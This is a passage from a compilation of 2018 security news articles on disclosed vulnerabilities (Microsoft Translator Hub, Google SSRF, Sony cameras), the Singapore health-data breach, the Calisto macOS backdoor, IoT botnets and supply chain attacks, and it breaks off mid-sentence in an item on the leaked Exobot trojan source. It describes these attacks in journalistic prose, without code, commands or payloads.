The service allows interested parties to build their own machine translation system tailored for their organizational needs and then use it, via the Microsoft Translator Text API, in applications, websites, with Microsoft Document Translator, and more.

According to Microsoft, the Translator Hub allows enterprises build translation systems, and allows governments, universities and language preservation communities to “build translation systems between any pair of languages, including languages not yet supported by Microsoft Translator, and reduce communication barriers.”

While hunting for vulnerabilities on the Hub, security researcher Haider Mahmood discovered that the HTTP request for removing a project contained the “projectid” parameter, which is the ID of the individual project in the database.

Furthermore, Mahmood also discovered that the request also had no Cross-Site Request Forgery (CSRF) protection. This means that an attacker could exploit the CSRF vulnerability to impersonate a legitimate, logged in user and perform actions on their behalf.

An attack scenario, he says, would require for an attacker to know the ProjectID number of a logged in victim. Thus, they could include a URL in a page to issue a remove command and, as soon as the victim visits that page, the request would be sent from their browser and the project removed.

Further analysis of the issue revealed an Indirect Object Reference vulnerability, which could essentially allow an attacker to set any ProjectID in the HTTP project removal request and delete any of the projects in Microsoft Translator Hub.

In fact, by iterating through project IDs starting from 0 to 13000, an attacker could delete all projects from the database, the security researcher reveals.

Mahmood reported the vulnerability to Microsoft in late February 2018. The company addressed the issue within the next two weeks, and also offered the researcher an acknowledgement on their Online Researcher Acknowledgement page.

State-Actors Likely Behind Singapore Cyberattack: Experts
23.7.2018 securityweek Cyber

State-actors were likely behind Singapore's biggest ever cyberattack to date, security experts say, citing the scale and sophistication of the hack which hit medical data of about a quarter of the population.

The city-state announced Friday that hackers had broken into a government database and stolen the health records of 1.5 million Singaporeans, including Prime Minister Lee Hsien Loong who was specifically targeted in the "unprecedented" attack.

Singapore's health minister said the strike was "a deliberate, targeted, and well-planned cyberattack and not the work of casual hackers or criminal gangs".

While officials refused to comment on the identity of the hackers citing "operational security", experts told AFP that the complexity of the attack and its focus on high-profile targets like the prime minister pointed to the hand of a state-actor.

"A cyber espionage threat actor could leverage disclosure of sensitive health information... to coerce an individual in (a) position of interest to conduct espionage" on its behalf, said Eric Hoh, Asia-Pacific president of cybersecurity firm FireEye.

Hoh told national broadcaster Channel NewsAsia that the attack was an "advanced persistent threat".

"The nature of such attacks are that they are conducted by nation states using very advanced tools," he said.

"They tend to be well resourced, well-funded and highly sophisticated."

Russia -- which is accused of meddling in the US presidential election -- China, Iran and North Korea are believed to have the capability to carry out such attacks.

Analysts, however, would not be drawn into speculation on who might be behind the hack or why Singapore was targeted.

The attack started two weeks after the wealthy city-state hosted the historic summit between US President Donald Trump and North Korean leader Kim Jong Un.

Jeff Middleton, chief executive of cybersecurity consultancy Lantium, said healthcare data is of particular interest to hackers because it can be used to blackmail people in positions of power.

"A lot of information about a person's health can be gleaned from the medications that they take," Middleton told AFP Saturday.

"Any non-public health information could be used for extortion. Russian spy services have a long history of doing this."

Medical information, like personal data, can also be easily monetised on criminal forums, said Sanjay Aurora, Asia-Pacific managing director of Darktrace.

"Beyond making a quick buck, a more sinister reason to attack would be to cause widespread disruption and systemic damage to the healthcare service -- as a fundamental part of critical infrastructure –- or to undermine trust in a nation's competency to keep personal data safe," he told AFP.

- Hyper-connected -

Today, cybercriminals are targeting more than just individuals or banks, said Shahnawaz Backer, regional security specialist at F5 Networks.

"Government services, from healthcare to education, are targets that are just as likely, as evidenced by the recent attacks in Singapore," Backer said.

"As Singapore embraces the digital revolution, security breaches are bound to happen. Our growing digital footprint is growing every day, and enterprises need to take strict measures to safeguard and protect their data."

Wealthy Singapore is hyper-connected and on a drive to digitise government records and essential services, including medical records which public hospitals and clinics can share via a centralised database.

But authorities have put the brakes on these plans while they investigate the breach. A former judge will head an inquiry looking into the hack.

Singapore officials have cautioned against jumping to conclusions about the attackers.

"With regard to the prime minister's data and why he was targeted, I would say that it's perhaps best not to speculate what the attacker had in mind," said David Koh, head of Singapore's Cyber Security Agency.

The hackers used a computer infected with malware to gain access to the database between June 27 and July 4 before administrators spotted "unusual activity", authorities said.

The government says it fends off thousands of cyberattacks every day and has long warned of breaches by actors as varied as high-school students in their bedrooms to nation-states.

Earlier this month, US intelligence chief Dan Coats described Russia, China, Iran and North Korea as the "worst offenders" when it came to attacks on American "digital infrastructure".

Half a Billion Enterprise Devices Exposed by DNS Rebinding
23.7.2018 securityweek Hacking

Nearly half a billion devices used by enterprises are exposed to cyberattacks by DNS rebinding, according to a study conducted by IoT security firm Armis.

DNS rebinding, an attack method that has been known for more than a decade, allows a remote hacker to bypass the targeted entity’s network firewall and abuse their web browser to directly communicate with devices on the local network and exploit any vulnerabilities they may have. Getting the target to access a malicious page or view a malicious advertisement is often enough to conduct an attack that can lead to theft of sensitive information and taking control of vulnerable devices.

Google Project Zero researcher Tavis Ormandy revealed a few months ago that DNS rebinding could be used to exploit critical flaws in BitTorrent’s uTorrent application and the Transmission BitTorrent client.

More recently, researcher Brannon Dorsey showed how malicious actors could exploit vulnerabilities in Google Home and Chromecast devices, Roku TVs, Sonos Wi-Fi speakers, routers, and smart thermostats via DNS rebinding.

Armis, the firm that discovered the Bluetooth flaws dubbed BlueBorne, conducted its own research on the impact of DNS rebinding on enterprises.

The company estimates that there are 496 million enterprise devices worldwide that are exposed due to DNS rebinding. This includes 165 million printers, 160 million IP cameras, 124 million IP phones, 28 million smart TVs, 14 million switches and routers, and 5 million media players.

Number of devices vulnerable to DNS rebinding attacks

“Because of the widespread use of the types of devices listed above within enterprises, Armis can say that nearly all enterprises are susceptible to DNS rebinding attacks,” Armis said.

As an example of vulnerabilities that can be exploited as a result of DNS rebinding, the company highlighted the flaws patched this month by Cisco in its IP phones. Armis also pointed to the critical security holes discovered recently in Axis and Foscam cameras.

As for printers, researchers noted, “Unfortunately, printers are one of the least managed, most poorly configured devices in the enterprise. Aside from adjusting basic network configurations, enterprises typically deploy printers with default settings, making them an ideal target for a DNS rebinding attack.”

In an attack scenario described by Armis, the attacker simply needs to trick the targeted user into visiting a specially crafted website which hosts JavaScript code that will be executed in the victim’s browser. The JavaScript code instructs the browser to scan local IP addresses in search of vulnerable devices.

Once vulnerable systems are identified, the attacker can use DNS rebinding to send arbitrary commands (e.g. log into the web server) directly to the IP address of the compromised IoT device. The attacker can also establish an outbound connection to the C&C server and chances are that none of these communications will be detected or blocked by security products.

Since DNS rebinding is possible due to how DNS and web browsers work, Armis believes the best way for enterprises to protect their networks against attacks is to monitor all devices for signs of a breach, perform a risk analysis of IoT devices to determine which systems are vulnerable, and ensure that the devices are secure, including by applying software patches and disabling unnecessary services.

Calisto macOS Backdoor Remained Undetected for Two Years
23.7.2018 securityweek Apple

A recently discovered backdoor targeting macOS systems remained undetected for at least two years, according to security firm Kaspersky Lab.

Dubbed Calisto, the malware was first uploaded to VirusTotal in 2016, likely the same year it was created, but it remained undetected by anti-virus solutions until May 2018, Kaspersky's security researchers say.

The backdoor is being distributed as an unsigned DMG image that masquerades as Intego’s Internet Security X9 for Apple's macOS. A comparison with the legitimate application shows that the threat looks fairly convincing, being likely to trick users, especially those who haven’t encountered the application before.

When launched, the malware displays a fake license agreement that differs only slightly compared to Intego’s legitimate agreement.

Next, Calisto asks for the user login and password but, as soon as the user provides the credentials, it hangs and displays an error message, informing the victim they should download a new installation package from Intego’s official site.

On machines with SIP (System Integrity Protection) enabled, an error occurs when the malware attempts to modify system files and it crashes. Apple introduced SIP in 2015 to protect critical system files from being modified, and it appears that the malware developers didn’t take that into account.

The Trojan uses a hidden directory named .calisto to store keychain storage data, data extracted from the user login/password window, network connection information, and Google Chrome data (history, bookmarks, and cookies).

If SIP is disabled, the malware copies itself to the /System/Library/ folder, sets itself to launch automatically on startup, unmounts and uninstalls its DMG image, adds itself to Accessibility, enables remote access to the system, and harvests additional information about the system and sends all data to the command and control (C&C) server.

The Trojan also includes some unfinished and unused functionality, such as the loading/unloading of kernel extensions for handling USB devices, data theft from user directories, and self-destruction (together with the OS).

Some of Calisto characteristics, Kaspersky says, would bring the malware close to the Backdoor.OSX.Proton family. The threat poses as a well-known antivirus (Proton was disguising as a Symantec product), its code contains the line “com.proton.calisto.plist,” and can steal a lot of personal data from the system, including the contents of Keychain.

The Proton remote access Trojan was discovered in 2017. It was being advertised as “a professional FUD surveillance and control solution” that could provide complete remote control of infected machines and could steal anything from credit card information to keystrokes and screenshots.

“The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton,” Kaspersky concludes.

SSRF Flaw Exposed Information From Google's Internal Network
23.7.2018 securityweek

A researcher has earned a significant bug bounty from Google after finding a serious server-side request forgery (SSRF) vulnerability that exposed information from the tech giant’s internal network.

The flaw was discovered by security engineer Enguerran Gillier in May and it took Google less than 48 hours to implement a patch. The expert earned $13,337 for his findings, which is the highest reward offered by the company for unrestricted file access issues.

Gillier identified the security hole after previously reporting a cross-site scripting (XSS) vulnerability in Google Caja, a tool that makes it safe to embed third party HTML, JavaScript and CSS code in a website.

He checked if the XSS attack he had discovered worked on Google Sites as well, which at the time used an unpatched version of Caja. After he failed to reproduce the XSS vulnerability, the expert tested for SSRF and discovered that the Google Sites Caja server was only fetching resources from Google domains.

The researcher bypassed this limitation by hosting a JavaScript file on Google Cloud services. The SSRF test resulted in a 1 Mb reply from the server, containing various pieces of private information from Google’s internal network.

Gillier reported his findings to Google, but continued conducting tests until the company rolled out a fix. While he did not manage to achieve unrestricted file access or remote code execution, the researcher did come across some interesting information from Google’s Borg, a datacenter management system that runs the company’s services.

A Borg cell includes a set of machines, a central controller named the Borgmaster, and an agent process called Borglet that runs on each machine.

Gillier made three test requests while Google was working on patching the issue and each of them led to the server responding with the status monitoring page of a Borglet. This provided the researcher various types of information, including what type of hardware powered the servers, performance data, and information on the tasks (jobs) submitted by users to Borg.

The researcher has made public some of the information he discovered. While none of the disclosed details appear to be particularly sensitive, some have questioned if he was allowed to make the information public and if he made the right choice in doing so.

“It’s not easy to determine the impact of an SSRF because it really depends on what’s in the internal network,” Gillier explained in a blog post. “Google tends to keep most of its infrastructure available internally and uses a lot of web endpoints, which means that in case of a SSRF, an attacker could potentially access hundreds if not thousands of internal web applications. On the other hand, Google heavily relies on authentication to access resources which limits the impact of a SSRF.”

“[Google] explained that while most internal resources would require authentication, they have seen in the past dev or debug handlers giving access to more than just info leaks, so they decided to reward for the maximum potential impact,” he added.

Mirai, Gafgyt IoT Botnet Attacks Intensify
23.7.2018 securityweek BotNet

Security researchers are warning of a new wave of attacks associated with two infamous Internet of Things (IoT) botnets: Mirai and Gafgyt.

Behind some of the largest distributed denial of service (DDoS) attacks in history, Mirai had its source code leaked in October 2016, soon after it first emerged. Numerous Mirai variants have spawned from its source code since, the most recent of which include Wicked and Omni.

Also known as Bashlite, Lizkebab, and Torlus, Gafgyt was first spotted in 2014 and had its source code leaked in early 2015. By the summer of 2016, the number of ensnared devices peaked at over 1 million, though they were spread over multiple botnets.

Three recent infection campaigns associated with these two botnets have revealed an increased interest from malware authors towards exploiting vulnerabilities in IoT devices, rather than weak credentials.

The attacks also appear to suggest once again that there could be a connection between the two botnets, something that initial reports on Mirai two years ago were detailing as well.

The first campaign is associated with Omni, one of the latest evolutions of Mirai, and stands out in the crowd because of its exclusive use of exploits, Palo Alto Networks reveals.

The botnet targets a broad range of exploits: two flaws in Dasan GPON routers that were made public in May (which have been targeted by botnets ever since), a Huawei router security bug, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a JAWS Webserver command execution, and a remote code execution in CCTVs and DVRs from over 70 vendors.

The campaign also shows the use of two different encryption schemes, doesn’t attempt to propagate via credential brute-forcing, and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The IP the malware was using for serving payloads and as a command and control (C&C) server was also observed being used by some Gafgyt samples that emerged around the same time.

The second campaign was using the same exploits as the first series of attacks, but also attempted credential brute force attacks, some of which are default credentials in Camtron IP cameras and Control4 and ADC FlexWave Prism devices.

The researchers also noticed that some of the samples included some brand new DDoS methods and that some of the newest samples completely removed the exploits and went back to exclusively attempting brute-force compromise.

The third campaign, the security researchers reveal, was no longer attempting to infect devices with a Mirai variant, but was delivering malware built on the Gafgyt source code that also includes a layer-7 DDoS-targeting function (SendHTTPCloudflare).

The attacks were targeting nearly all exploits as the first campaign, along with the brute-forcing attempts observed as part of the second campaign, but also started using a D-Link DSL-2750B OS command injection exploit.

One of the effects of these new campaigns was a surge in attacks targeting Small-Office/Home Office (SOHO) network devices manufactured by Dasan and D-Link, as eSentire alerted. According to the security firm, over 3000 source IPs were involved in the attack, but all were coordinated by a single-source command.

As Palo Alto Networks points out, the new attacks prove once again how attackers can build large botnets consisting of different types of devices and control them from a single C&C server.

“This is exacerbated by the speed of exploitation in the wild of newly released vulnerabilities and also highlights the need for security vendor reactivity in response to these disclosures, applicable to the subset of these devices that do fall under the protection of security devices,” the security firm concludes.

Sony Patches Remotely Exploitable Vulnerabilities in Network Cameras
23.7.2018 securityweek

Two serious, remotely exploitable vulnerabilities in Sony IPELA E Series Network Camera products could allow attackers to execute commands or arbitrary code on affected devices.

Tracked as CVE-2018-3937, the first of the vulnerabilities is a command injection flaw in the measurementBitrateExec functionality of the IPELA E Series Network Camera. These are network facing devices used for monitoring and surveillance.

The issue was discovered by Cory Duplantis and Claudio Bozzato of Cisco Talos, who explain that arbitrary commands could be executed via a specially crafted GET request. An attacker looking to trigger the vulnerability could simply send an HTTP request for that.

“While parsing the input measurement string, there isn't a check on the server address (-c). In this manner, any string can be placed as the server address and will be executed via system. Knowing this, an attacker can execute arbitrary commands in the position of the server address,” the researchers explain.

The second vulnerability is tracked as CVE-2018-3938 and affects the 802dot1xclientcert.cgi functionality of IPELA E Series Camera devices.

“A specially crafted POST can cause a stack-based buffer overflow, resulting in remote code execution. An attacker can send a malicious POST request to trigger this vulnerability,” Cisco says.

The 802dot1xclientcert.cgi endpoint, the security researchers explain, is “designed to handle everything related to certificate management for 802.1x.”

When data is received, certain checks are performed and the data is then directly copied to a local buffer via memcpy. However, because the strlen length is not checked against a safe value, a stack-based buffer overflow occurs and an attacker can abuse it to remotely execute commands on the device.

Both vulnerabilities were reported to Sony last month. Featuring a CVSS score of 9.1, both of these issue were found in Sony IPELA E series G5 firmware 1.87.00. Sony released an update last week to address the security bugs.

Software Supply Chain Increasingly Targeted in Attacks: Survey
23.7.2018 securityweek Hacking

Organizations increasingly have to deal with cyberattacks targeting the software supply chain and in many cases they are not adequately prepared to respond to such incidents, according to a report published on Monday by endpoint security firm CrowdStrike.

In supply chain attacks, malicious actors target software makers in an effort to modify their products so that they perform malicious actions of provide a backdoor into the targeted environment.

The NotPetya attack, which involved a Ukrainian tax software firm, and the CCleaner incident, which involved hacking of distribution servers at Piriform, are some of the most well-known examples, but supply chain attacks are becoming increasingly common.

Vanson Bourne, on behalf of CrowdStrike, surveyed 1,300 senior IT decision makers and security professionals in the U.S., Canada, Mexico, the U.K., Australia, Japan, Germany and Singapore in April and May.

The Securing the Supply Chain report shows that roughly one-third of organizations are concerned about supply chain attacks, with 18% and 38% saying that the risk is high and moderate, respectively.

Approximately two-thirds of respondents have experienced some form of supply chain attack. The biotechnology and pharmaceutical sector takes the lead with 82% of organizations encountering such an incident, including 45% being hit in the last 12 months. Other sectors more likely to encounter supply chain attacks include hospitality, entertainment and media (74%), IT and technology (74%), engineering (73%), healthcare (70%) and insurance (68%).

Supply chain attacks

On average, organizations believe it would take them 10 hours to detect an incident, 13 hours to react, 15 hours to respond, and 25 hours to remediate it, which totals 63 hours, the report shows.

A vast majority of respondents that have encountered a supply chain incident reported a financial impact, with an average cost of roughly $1.1 million. The highest costs were reported by the hospitality, entertainment and media sector ($1.44 million) and the lowest in the government sector ($329,000).

Some companies have also paid a ransom to recover from a supply chain attack, with many respondents saying their own organization or others in their industry had paid.

In addition to financial loss, organizations experienced various types of drawbacks following an attack, including the necessity to completely rebuild IT systems (36%), spend more on security (36%), and service/operations disruption (34%).

When it comes to response strategies, over one-third of respondents said they had a comprehensive strategy in place when they suffered an attack and more than half had some level of response pre-planned.

Trust in suppliers is not very high, with only 35% of respondents saying they had been totally certain they would be informed of a cybersecurity incident. On the other hand, 39% of those surveyed said they had lost trust in a supplier over the past year.

Less than a third of the organizations that took part in the survey vetted all suppliers in the past 12 months, and the high profile attacks that came to light last year made the vetting process more rigorous in 59% of cases. Executives have also started changing their attitude in regards to this threat, with 31% becoming more involved, 49% planning to become more involved, and 13% taking more of an interest.

The source code of the Exobot Android banking trojan has been leaked online
23.7.2018 securityaffairs Android

The source code of the Exobot Android banking trojan has been leaked online, researchers already verified its authenticity.
The source code of the Exobot Android banking trojan has been leaked online and experts believe that we will soon assist at a new wave of attacks based on the malware.

The Exobot Android banking trojan was first spotted at the end of 2016 when its authors were advertising it on the dark web.

The authors were advertising it saying that it can be used for phishing attacks, it implements various features of most com